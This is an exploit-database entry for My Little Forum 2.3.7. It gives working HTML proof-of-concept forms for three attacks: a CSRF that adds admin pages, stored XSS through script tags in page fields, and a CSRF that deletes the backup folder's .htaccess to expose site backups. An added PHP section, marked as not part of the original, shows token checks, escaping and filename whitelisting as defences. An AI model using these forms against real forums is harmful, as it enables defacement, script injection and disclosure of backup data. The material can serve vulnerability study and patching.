ID 1337DAY-ID-26198 Type zdt Reporter Ashiyane Modified 2016-11-02T00:00:00
Description
Exploit for php platform in category web applications
Title:
======
My Little Forum 2.3.7 - Multiple Vulnerabilities
Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded view (tree structure). It is
Open Source licensed under the GNU General Public License. The main
claim of this web forum is simplicity. Furthermore it should be easy to
install and run on a standard server configuration with PHP and MySQL.
Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip
Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allowing Backup Disclosure
Vulnerability Details:
==============================
This web application is vulnerable and suffers from several vulnerabilities.
Severity Level:
===============
High
Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit, a page can be added to the web application.
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Title">
<input type="hidden" name="content" value="Content">
<input type="hidden" name="menu_linkname" value="Name">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
2. Stored XSS:
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Stored XSS <script>alert(1)</script>">
<input type="hidden" name="content" value="Stored XSS <script>alert(2)</script>">
<input type="hidden" name="menu_linkname" value="Stored XSS <script>alert(3)</script>">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
3. Backup Disclosure:
With this exploit, the .htaccess file in the backup folder can be deleted,
which gives access to the backups.
<form action="http://localhost/mylittleforum-master/index.php"
method="post" accept-charset="utf-8">
<div>
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="delete_backup_files[]" value=".htaccess">
<input type="submit" name="delete_backup_files_confirm" value="OK - Delete">
</div>
</form>
After using the exploit, go to:
http://localhost/mylittleforum-master/backup/
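
Server-side checks that would reject each of the three requests above, as an added PHP example (not part of the original advisory and not My Little Forum's own code). The function names, the csrf_token field and the ".sql" backup naming pattern are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration; all function names here are hypothetical.

// Per-session anti-CSRF token, embedded as a hidden field in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a cross-site form cannot read the token, so it fails here.
function csrf_valid(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Escape stored page fields (title, content, menu_linkname) at output time.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only plain backup file names; ".htaccess" and path tricks are rejected.
// Assumption: backups are named like "backup_2016-11-02.sql".
function deletable_backups(array $requested): array {
    $ok = [];
    foreach ($requested as $name) {
        if (is_string($name) && preg_match('/\A[A-Za-z0-9_-]+\.sql\z/', $name) === 1) {
            $ok[] = $name;
        }
    }
    return $ok;
}

// Constructed demo input mirroring the three PoC requests.
$_SESSION = [];                       // stand-in for a started admin session
$token  = csrf_token();
$forged = ['mode' => 'admin', 'title' => 'Stored XSS <script>alert(1)</script>'];
$legit  = $forged + ['csrf_token' => $token];

var_dump(csrf_valid($forged));        // cross-site request without the token
var_dump(csrf_valid($legit));         // request submitted from the real admin form
echo h($legit['title']), PHP_EOL;     // script tag is emitted as inert text
var_dump(deletable_backups(['.htaccess', '../index.php', 'backup_2016-11-02.sql']));
```

Independently of the application, the web server configuration for the backup directory should deny direct access so that protection does not depend on a deletable .htaccess file.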
# 0day.today [2018-01-04] #